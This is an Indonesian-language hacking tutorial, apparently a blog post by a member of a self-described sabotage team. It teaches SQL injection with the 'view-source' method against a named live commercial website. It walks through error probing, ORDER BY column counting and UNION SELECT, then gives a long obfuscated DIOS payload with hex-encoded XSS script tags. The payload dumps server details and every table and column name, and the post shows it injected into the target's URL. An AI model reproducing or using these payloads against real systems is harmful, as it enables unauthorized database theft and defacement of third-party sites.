Ok guys Kembali lagi bersama gua ./numb_404 Guys Ya, oke kali ini gua akan memberikan tutorial SQL injection lagi, tapi kali ini berbeda kali ini kita akan memakai methode views-source.
Oke langsung aja ke tutorialnya tanpa berlama-lama kita akan menyiapkan bahan-bahannya
- Hp/Pc/Laptop
- Jaringan Internet
- Dh Hackbar
Oke bagi yang enggak ada Dh Hackbar saya akan berikan link aplikasinya
untuk live target atau webnya
》http://www.privatecollection.com.hk
Dork>>http://www.privatecollection.com.hk/en/product.php?cid=5683
Oke Langsung aja kita mulai untuk menginjectnya.
PERINGATAN
Kalian harus terlebih dahulu untuk mengetahui poin-poin penting dalam SQL injection, saya akan memberikannya di lain kesempatan.
1. tampilan pertama》http://www.privatecollection.com.hk/en/product.php?cid=5683
Hal pertama yang harus kita lakukan adalah memperhatikan indexnya, seperti yang kita ketahui index adalah tampilan awal dari sebuah website atau aplikasi contohnya ada pada Google, tampilan Google pada saat kita melakukan pencarian di Google itu sendiri adalah tampilannya yang berwarna putih dan terdapat tulisan Google+Telusuri (search).
Dan itu contoh dari Google sendiri tapi yang kita bahas bukan Google melainkan website yang vuln SQL di atas, Baiklah setelah kita mengamati indeksnya atau tampilan awalnya kita akan tau tampilannya seperti apa.
==================
2. Single quote atau double quote ('/")
Seperti yang kita ketahui rata-rata pemain SQL injection sudah mengetahui single quote atau double quote atau yang sering biasanya disebut tanda petik (').
Fungsi single quote atau double quote ini adalah untuk mengecek error atau vuln dalam website, rata-rata pemain SQL itu menggunakan single quote terlebih dahulu dibanding double quote, dan berikan single quote ini di parameter angka.
CONTOH》http://www.privatecollection.com.hk/en/product.php?cid=5683'
Seperti yang kalian lihat di gambar di atas kalian akan menemukan kan tulisan atau peringatan error atau vuln dari website tersebut ketika kita memberikan single quote di parameter, dan yang harus kita lakukan adalah menormalkannya kembali dengan cara>>
PERINGATAN
Tidak semua website mendukung single quote
=======================
3.URL BALANCER
URL balancer berfungsi dan berguna untuk menormalkan website yang telah diberikan single quote, contoh-contoh URL balancer itu sangatlah banyak.
- CONTOH》--+-
- -- -
- ;%00
- )--+-
Dan masih banyak lagi contoh URL balancer tapi saya hanya menyebutkan beberapa tidak mungkin saya menyebutkan semuanya dan url balancer itu ada di DH Hackbar kalian bisa lihat sendiri.
Seperti yang kita lihat websitenya nya normal kembali, sudah saya peringatkan diatas saat gunakan single quote, tidak semua website mendukung single quote.
Oke sebelum lanjut saya akan mencontohkan website yang tidak mendukung single quote.
Disini Saya hanya mencontohkan saja sebuah website yang tidak mendukung single quote, ketika kita memberikan URL balancer dia akan tetap eror dikarenakan dia tidak support single quote hal yang harus kita lakukan adalah menghapus single kuat tersebut dan menyisakan URL balancer dan seperti ini tampilannya
Dan dia akan terlihat normal ketika tidak ada URL balancer Seperti yang saya bilang tidak semua website mendukung atau support single quote
PERINGATAN
URL balancer itu selalu di paling belakang letaknya.
Oke lanjut disini Saya tidak membahas tentang website yang Saya bahas barusan tapi kita akan melanjutkan tutorial SQL injection metode view-source.
========================
4. ORDER+BY
Order by berfungsi dan berguna untuk menghitung angka column, atau saya pribadi mengatakannya menghitung angka target.
Saya akan memberikan contohnya
Dan kita lihat tampilannya
PERINGATAN
Angka target pada order by adalah angka normal sebelum error yang diartikan sebelum websitenya error itu adalah angka targetnya.
Ketika kita melakukan order by atau penghitungan angka saya mendapatkan angka 26 yang terletak pada angka error.
Ketika angka 26 error Coba kita kurangin lagi angkanya di angka 25.
Saya mendapatkan angka 25 yang dapat menormalkan website sedangkan angka 26 indeksnya terdapat error di dalamnya yang diartikan angka 25 adalah angka targetnya.
============================
5. UNION+SELECT
Union select berfungsi untuk memunculkan angka target yang berada di dalam website, contoh kecilnya ketika kita melakukan Union select dan Akan terdapat angka tertentu pada index tersebut.
PERINGAN
Ketika kita melakukan Union select itu berpacu kepada order by, saya berikan sedikit contoh tapi tidak melalui website.
Ketika kita melakukan order by dan mendapatkan angka tertentu atau angka target contohnya angka 26 tadi maka kita akan melakukan Union select pada angka 26 juga maka cara mengerjakannya seperti ini.
Ingat di judul yaitu tutorial views-source jadi saya ingin langsung pada intinya yaitu menggunakan 4X method dalam melakukan Union select
》
http://www.privatecollection.com.hk/en/product.php?cid=5683'AND 0 UNION SELECT 1111,1112,1113,1114,1115,1116,1117,1118,1119,11110,11111,11112,11113,11114,11115,11116,11117,11118,11119,11120,11121,11122,11123,11124,11125--+-Seperti yang saya bilang saya akan melakukan views-source ke dalam website tersebut karena website tersebut tidak mengeluarkan angka sama sekali jadi kita kan lanjut.
》
view-source:http://www.privatecollection.com.hk/en/product.php?cid=5683'AND 0 UNION SELECT 1111,1112,1113,1114,1115,1116,1117,1118,1119,11110,11111,11112,11113,11114,11115,11116,11117,11118,11119,11120,11121,11122,11123,11124,11125,11126--+-Tugas kita di sini adalah untuk mencari angka targetnya dan saya mendapatkan angka 19 pada angka target, Baiklah Langsung aja kita inject di angka 19.
====================
6.DIOS (DUMP IN ONE SHOOT)
Dios atau dump in one shoot adalah kata perintah yang artinya bisa kalian Translate sendiri di Google Translate Baiklah tanpa berlama-lama saya akan langsung memberikan di atasnya atau Dump in one shoot...
DIOS SAYA》》》/*!50000CoNcAt/**numb**/*/(0x3c62723e,0x3c7363726970743e70726f6d7074282253514c6920746f205853535f4259207b202e2f6e756d625f343034207d222c646f63756d656e742e646f6d61696e293c2f7363726970743e,0x3c7363726970743e616c657274282753514c6920746f205853535f4259207b202e2f6e756d625f343034207d27293b3c2f7363726970743e,0x3c7363726970743e70726f6d7074282753514c6920746f205853535f4259207b202e2f6e756d625f343034207d27293b3c2f7363726970743e,0x3C696D67207372633D2268747470733A2F2F672E746F7034746F702E696F2F705F323030327175336266302E6A70656722206865696768743D223930222077696474683D223930223E,0x3c666f6e7420636f6c6f723d22726564223e3c623e,0x494E4A4543544544204259202E2F6E756D625F343034,0x3c2f623e,0x3c2f666f6e743e,0x3c62723e,0x55736572207c7c3d3e7c7c20,/*!50000current_user/**numb**/*/,0x3c62723e,0x56657273696f6e207c7c3d3e7c7c20,/*!50000version/**numb**/*/(),0x3c62723e,0x4461746162617365207c7c3d3e7c7c20,database/*data*//**numb**/(),0x3c62723e,0x3c62723e,0x54696d65207c7c3d3e7c7c20,/*!50000now()/**numb**/*/,0x3c62723e,0x486f73744e616d65207c7c3d3e7c7c20,/*!50000@@hostname/**numb**/,0x3c62723e,0x506f7274207c7c3d3e7c7c20,/*!50000@@port/**numb**/,0x3c62723e,0x546d70646972207c7c3d3e7c7c20,/*!50000@@tmpdir/**numb**/,0x3c62723e,0x44617461646972207c7c3d3e7c7c20,/*!50000@@datadir/**numb**/,0x3c62723e,0x42617365646972207c7c3d3e7c7c20,/*!50000@@basedir/**numb**/,0x3c62723e,0x4c6f675f6572726f72207c7c3d3e7c7c20,/*!50000@@log_error/**numb**/,0x3c62723e,0x42696e5f6c6f67207c7c3d3e7c7c20,/*!50000@@binlog_format/**numb**/,0x3c62723e,0x54696d655f666f726d6174207c7c3d3e7c7c20,/*!50000@@time_format/**numb**/,0x3c62723e,0x446174615f666f726d6174207c7c3d3e7c7c20,/*!50000@@date_format/**numb**/,0x3c62723e,0x53796e746178207c7c3d3e7c7c20,/*!50000@@ft_boolean_syntax/**numb**/,0x3c62723e,0x496e6e6f6462207c7c3d3e7c7c20,/*!50000@@innodb_log_group_home_dir/**numb**/,0x3c62723e,0x53594d4c494e4b207c7c3d3e7c7c20,/*!50000@@GLOBAL.have_symlink/**numb**/,0x3c62723e,0x43757272656e745f75736572207c7c3d3e7c7c20,/*!50000current_user/**numb**/,0x3c62723e,0x53736c207c7c3d3e7c7c20,/*!50000@@global.have_ssl/**numb**/,0x3c62723e,0x4f7065726174696e675f73797374656d207c7c3d3e7c7c20,/*!50000@@version_compile_os/**numb**/,0x3c62723e,0x4368617261637465725f646972207c7c3d3e7c7c20,/*!50000@@character_sets_dir/**numb**/,0x3c62723e,0x536f636b6574207c7c3d3e7c7c20,/*!50000@@socket/**numb**/,0x3c62723e,0x55756964207c7c3d3e7c7c20,/*!50000uuid()/**numb**/*/,0x3c62723e,0x506964207c7c3d3e7c7c20,/*!50000@@pid_file/**numb**/,0x3c62723e,0x4f7065726174696e675f4d616368696e65207c7c3d3e7c7c20,/*!50000@@version_compile_machine/**numb**/,0x3c62723e,0x53797374656d5f66696c65207c7c3d3e7c7c20,/*!50000@@character_set_filesystem/**numb**/,0x3c62723e,0x576169745f74696d656f7574207c7c3d3e7c7c20,/*!50000@@WAIT_TIMEOUT/**numb**/,0x3c62723e,0x5265636f7665726f7074696f6e73207c7c3d3e7c7c20,/*!50000@@MYISAM_RECOVER_OPTIONS/**numb**/,0x3c62723e,0x436f6e6e656374696f6e207c7c3d3e7c7c20,/*!50000@@COLLATION_CONNECTION/**numb**/,0x3c62723e,0x3c62723e,(select(@x)/*!50000from/**numb**/*/(/*!50000select/**numb**/*/(@x:=0x00),(select(0)/*!From/**numb**/*/(/*!50000information_schema.columns/**numb**/*/)/*!50000where/**numb**/*/(table_schema=database/*data*//**numb*/())and(0x00)in(@x:=/*!50000coNcat/**numb**/*/(@x,0x3c6c693e,/*!50000table_name/**numb**/*/,0x207c7c3d3e7c7c20,/*!50000column_name/**numb**/*/))))x))
Dan dia yang saya berikan di atas akan saya berikan kan di angka 19
CONTOH》
http://www.privatecollection.com.hk/en/product.php?cid=5683'AND 0 UNION SELECT 1111,1112,1113,1114,1115,1116,1117,1118,1119,11110,11111,11112,11113,11114,11115,11116,11117,11118,/*!50000CoNcAt/**numb**/*/(0x3c62723e,0x3c7363726970743e70726f6d7074282253514c6920746f205853535f4259207b202e2f6e756d625f343034207d222c646f63756d656e742e646f6d61696e293c2f7363726970743e,0x3c7363726970743e616c657274282753514c6920746f205853535f4259207b202e2f6e756d625f343034207d27293b3c2f7363726970743e,0x3c7363726970743e70726f6d7074282753514c6920746f205853535f4259207b202e2f6e756d625f343034207d27293b3c2f7363726970743e,0x3C696D67207372633D2268747470733A2F2F672E746F7034746F702E696F2F705F323030327175336266302E6A70656722206865696768743D223930222077696474683D223930223E,0x3c666f6e7420636f6c6f723d22726564223e3c623e,0x494E4A4543544544204259202E2F6E756D625F343034,0x3c2f623e,0x3c2f666f6e743e,0x3c62723e,0x55736572207c7c3d3e7c7c20,/*!50000current_user/**numb**/*/,0x3c62723e,0x56657273696f6e207c7c3d3e7c7c20,/*!50000version/**numb**/*/(),0x3c62723e,0x4461746162617365207c7c3d3e7c7c20,database/*data*//**numb**/(),0x3c62723e,0x3c62723e,0x54696d65207c7c3d3e7c7c20,/*!50000now()/**numb**/*/,0x3c62723e,0x486f73744e616d65207c7c3d3e7c7c20,/*!50000@@hostname/**numb**/,0x3c62723e,0x506f7274207c7c3d3e7c7c20,/*!50000@@port/**numb**/,0x3c62723e,0x546d70646972207c7c3d3e7c7c20,/*!50000@@tmpdir/**numb**/,0x3c62723e,0x44617461646972207c7c3d3e7c7c20,/*!50000@@datadir/**numb**/,0x3c62723e,0x42617365646972207c7c3d3e7c7c20,/*!50000@@basedir/**numb**/,0x3c62723e,0x4c6f675f6572726f72207c7c3d3e7c7c20,/*!50000@@log_error/**numb**/,0x3c62723e,0x42696e5f6c6f67207c7c3d3e7c7c20,/*!50000@@binlog_format/**numb**/,0x3c62723e,0x54696d655f666f726d6174207c7c3d3e7c7c20,/*!50000@@time_format/**numb**/,0x3c62723e,0x446174615f666f726d6174207c7c3d3e7c7c20,/*!50000@@date_format/**numb**/,0x3c62723e,0x53796e746178207c7c3d3e7c7c20,/*!50000@@ft_boolean_syntax/**numb**/,0x3c62723e,0x496e6e6f6462207c7c3d3e7c7c20,/*!50000@@innodb_log_group_home_dir/**numb**/,0x3c62723e,0x53594d4c494e4b207c7c3d3e7c7c20,/*!50000@@GLOBAL.have_symlink/**numb**/,0x3c62723e,0x43757272656e745f75736572207c7c3d3e7c7c20,/*!50000current_user/**numb**/,0x3c62723e,0x53736c207c7c3d3e7c7c20,/*!50000@@global.have_ssl/**numb**/,0x3c62723e,0x4f7065726174696e675f73797374656d207c7c3d3e7c7c20,/*!50000@@version_compile_os/**numb**/,0x3c62723e,0x4368617261637465725f646972207c7c3d3e7c7c20,/*!50000@@character_sets_dir/**numb**/,0x3c62723e,0x536f636b6574207c7c3d3e7c7c20,/*!50000@@socket/**numb**/,0x3c62723e,0x55756964207c7c3d3e7c7c20,/*!50000uuid()/**numb**/*/,0x3c62723e,0x506964207c7c3d3e7c7c20,/*!50000@@pid_file/**numb**/,0x3c62723e,0x4f7065726174696e675f4d616368696e65207c7c3d3e7c7c20,/*!50000@@version_compile_machine/**numb**/,0x3c62723e,0x53797374656d5f66696c65207c7c3d3e7c7c20,/*!50000@@character_set_filesystem/**numb**/,0x3c62723e,0x576169745f74696d656f7574207c7c3d3e7c7c20,/*!50000@@WAIT_TIMEOUT/**numb**/,0x3c62723e,0x5265636f7665726f7074696f6e73207c7c3d3e7c7c20,/*!50000@@MYISAM_RECOVER_OPTIONS/**numb**/,0x3c62723e,0x436f6e6e656374696f6e207c7c3d3e7c7c20,/*!50000@@COLLATION_CONNECTION/**numb**/,0x3c62723e,0x3c62723e,(select(@x)/*!50000from/**numb**/*/(/*!50000select/**numb**/*/(@x:=0x00),(select(0)/*!From/**numb**/*/(/*!50000information_schema.columns/**numb**/*/)/*!50000where/**numb**/*/(table_schema=database/*data*//**numb*/())and(0x00)in(@x:=/*!50000coNcat/**numb**/*/(@x,0x3c6c693e,/*!50000table_name/**numb**/*/,0x207c7c3d3e7c7c20,/*!50000column_name/**numb**/*/))))x)),11120,11121,11122,11123,11124,11125--+-Dan Bom Saya telah berhasil menginjaknya dengan menggunakan metode view source, metode views-source biasa digunakan untuk website tidak menampilkan angka target di indeks tersebut.
Sampai sinilah materi yang saya berikan kepada kalian mengenai metode views-source oke.
SAYA AQIL ATAU NUMB LEADER SABOTASE SINDYCATE TEAM MENGUCAPKAN》JANGAN LUPA MAKAN.